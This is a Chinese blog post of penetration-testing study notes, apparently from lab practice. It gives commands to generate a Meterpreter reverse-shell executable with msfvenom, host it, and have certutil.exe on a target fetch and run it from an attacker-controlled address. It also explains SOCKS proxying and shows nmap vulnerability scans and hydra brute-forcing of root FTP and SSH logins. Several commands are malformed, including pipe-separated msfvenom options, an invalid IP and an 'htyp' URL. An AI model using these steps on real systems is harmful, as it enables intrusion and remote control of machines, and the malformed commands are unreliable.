首页 > 其他分享 >迷迷糊糊学习笔记

迷迷糊糊学习笔记

时间:2022-10-20 17:58:26浏览次数:56  
标签:exe 192.168 端口 代理 socks 学习 shell 笔记 迷迷糊糊

poweshell是最稳定的一个工具
点击文件名,
certuil.exe 是作为证书服务的一部分安装的命令行程序,我们可以使用此工具在,目标计算机中执行恶意的exe文件以获得meterpreter会话。
msfvenom -p windows/meterpreter/reverse_tcp|host=路径|port=1234 -f exe > shell.exe
python -m SimpleHTTPServer 8000

certutil.exe -urlcache -split -f http://192.168.1.2727:8000/shell.exe shell.exe & shell.exe
certutil.exe -urlcache -split -f htyp://192.168.1.227:8000/shell.exe shell.exe delete

内网渗透漫游之Socks代理
Socks代理简介
socks是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。
根据OSI模型,socks是会话层的协议,位于表示层与传输层之间。
使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层网关服务。
被代理端与代理服务器通过socks4/5代理协议进行通讯;
socks4是对HTTP代理协议的加强,它不仅代理HTTP协议,而是对所有向外的连接进行代理,没有协议限制;
socks5对前一版本做了进一步扩展,增加了支持UDP代理和身份验证功能,采用地址解析方案以支持域名和IPv6地址解析。

使用socks代理:
socks服务器的IP地址
socks服务所在端口
socks服务是否需要身份验证

什么是Socks
现今大多组织的网络架构,利用网络防火墙将组织内部的网络结构与外部网络如Internet有效地隔离开来。
这些防火墙系统通常以应用层网关的形式在网络之间,提供受控的TELNET、FTP、SMTP等的接入。
而socks则提供一个通用框架来使这些协议安全透明地穿过防火墙。

socks代理工具介绍
EW是一套便携式的网络穿透工具,具有socks v5服务架构和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
proxyChains工具

测试Target1-信息收集
nmap -A -T4 -p- --script vuln 192.168.1.195
开放端口:21/22/80/111/3306/8888

测试Target1-分析利用
21/22端口:弱口令爆破
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ftp
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.195 ssh

3306端口:不允许远程IP连接
8888端口:宝塔登录页面

标签:exe,192.168,端口,代理,socks,学习,shell,笔记,迷迷糊糊
From: https://www.cnblogs.com/manmanwei/p/16810730.html

相关文章

  • 初体验!老男孩linux运维班学习心得分享
    以下内容来自学员分享:在来老男孩之前,心里有忐忑,有不安,还有激动和质疑,虽然很多人都说年龄大不适合转行学技术,但想想自己肩上的重担,还是来到了这里。28岁,有房有车,同样有房贷有......
  • 【THM】-Post-Exploitation Basics(后渗透基础)-学习
    观前提示本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/postexploit介绍本文主要涉及关于后渗透的基础知识,主要内容有:使用powerview和Bloodhound进行后......
  • 机器学习实践:了解数据核心的通用方法!
    作者:耿远昊,华东师范大学我们常说数据和特征决定了机器学习的上限,而模型和算法只是逼近这个上限。机器学习中的数据繁多复杂,我们很容易迷失在无尽的具体数据中,迅速抓住数据集......
  • 【Kubernetes】K8s笔记(十):Service 解决服务发现的关键问题
    目录0.打造Service对象的动机1.Service的工作原理2.使用YAML描述Service3.在Kubernetes中使用Service4.以域名方式使用Service5.让Service对外暴露服务......
  • 前端笔记-html-引用-20221020
    HTML引用1.<q>标签:用于短的引用。浏览器通常会为<q>元素包围引号。<p>WWF的<q>目标是构建人与自然和谐共处的世界</q></p> 2.<blockquote>标签:长引用。浏览器......
  • 机器学习之特征提取(二)——字典类型特征提取(特征离散化)
    字典类型和CountVectorizer文本类型的特征基本相同,不同的是输出的结果类型,字典直接返回的键值对。以下代码用jupyter分块运行运行结果含义参考上一篇:https://www.cnblogs......
  • 机器学习之特征提取(一)—— CountVectorizer文本特征提取
    CountVectorizer是文本特征提取的一种方式:本文为稀疏矩阵具体含义其中new_data所输出的值用toarray()可以转化为稀疏矩阵new_data.shape():输出的是稀疏矩阵的维度(列表长......
  • ansible学习笔记
    ansible基础[toc]ansible批量管理服务器的工具2015年被红帽公司收购使用Python语言编写的基于ssh进行管理,所以不需要在被管端安装任何软件ansible在管理远程主机的时候,主要......
  • 根号算法学习记录
    根号算法专题分块基础根号平衡对于两个不同方面的复杂度,直接做的话一个很小,一个很大,我们用根号使得两者复杂度同阶级以降低总复杂度。这个叫根号平衡。一个典型的应用......
  • 算法数学笔记-五、群论入门
    #五、群论入门####群的定义可以理解为:$群G(S,*)=集合(S)+运算(*)$群的4个条件:在运算$*$作用下:1.封闭性2.存在单位元3.逆元存在4.$*$运算满足结合律 ####......